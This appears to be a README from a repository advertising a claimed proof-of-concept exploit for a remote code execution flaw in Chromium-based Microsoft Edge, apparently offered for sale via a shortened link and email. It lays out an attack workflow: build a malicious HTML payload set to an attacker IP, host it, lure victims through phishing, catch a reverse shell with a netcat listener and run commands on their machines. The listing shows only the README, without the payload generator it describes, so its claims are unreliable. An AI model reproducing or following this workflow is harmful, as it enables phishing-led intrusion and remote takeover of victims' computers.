# CVE-2025-59251 Exploit: Microsoft Edge Chromium RCE
## Overview
This repository contains a proof-of-concept exploit for CVE-2025-59251, a critical remote code execution vulnerability in Microsoft Edge (Chromium-based) versions up to 140.0.3485.71. The vulnerability allows for code injection via remote manipulation, impacting confidentiality, integrity, and availability. Successful exploitation requires user interaction, such as visiting a malicious webpage, but can be launched remotely without authentication.
This exploit has been tested on Windows 10/11 environments with default Edge installations. It leverages a flaw in the handling of externally-influenced input during code segment construction (CWE-94), allowing arbitrary code execution in the browser's sandboxed process.
## Usage
1. **Generate Payload**:
- Run `node generate-payload.js --target-ip <attacker-ip> --port <listener-port> --output exploit.html`
- This creates a malicious HTML file with embedded JS that exploits the code injection vector.
2. **Delivery**:
- Host the `exploit.html` on a web server (e.g., via Python: `python -m http.server 8080`).
- Lure the victim to visit the URL (e.g., via phishing email or social engineering).
- Listen for incoming connections using netcat: `nc -lvnp <port>`
3. **Execution**:
- Upon victim interaction, the exploit injects shellcode, escapes the sandbox, and executes arbitrary commands (e.g., spawning cmd.exe or PowerShell).
- Example shellcode included for demonstration: reverse TCP connection.
## Disclaimer
This tool is for educational and security research purposes only. Use on authorized systems with permission. Seller assumes no liability for misuse.
[href](https://tinyurl.com/253xb9ns)
For any inquiries, please email me at: anthonmullins@op.pl
[4.0K] /data/pocs/e42183ebf6073953e3663526229d4292fb26b500
└── [1.8K] README.md
0 directories, 1 file